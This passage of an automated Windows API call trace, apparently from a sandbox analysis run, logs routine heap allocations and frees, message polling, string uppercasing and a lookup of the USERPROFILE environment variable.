wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.559] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.559] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0266.559] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0266.560] FreeLibrary (hLibModule=0x74d40000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.560] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.560] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.560] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0266.561] CloseHandle (hObject=0x2c8) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0266.562] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0266.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0266.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0266.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0266.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0266.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0266.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0266.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac978 [0266.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0266.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0266.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0266.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0266.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0266.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0266.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.564] CloseHandle (hObject=0x2d0) returned 1 [0266.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0266.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0266.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0266.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0266.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0266.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0266.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0266.570] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0266.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0266.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0266.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0266.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0266.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0266.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0266.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0266.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0266.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0266.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0266.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0266.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0266.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0266.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0266.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0266.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0266.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0266.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0266.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0266.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0266.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0266.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0266.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0266.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0266.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0266.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0266.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0266.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0266.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0266.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0266.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0266.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0266.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0266.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0266.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0266.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0266.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0266.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0266.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0266.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0266.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0266.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0266.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0266.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0266.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0266.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0266.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0266.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0266.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0266.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0266.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0266.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0266.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0266.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0266.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0266.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0266.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0266.586] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0266.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0266.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0266.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0266.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0266.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0266.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0266.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0266.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0266.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0266.587] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0266.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0266.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0266.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0266.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0266.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0266.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0266.588] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0266.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0266.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0266.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0266.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0266.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0266.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0266.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0266.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0266.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0266.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0266.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0266.595] HeapFree (in: hHeap=0x25c0000, 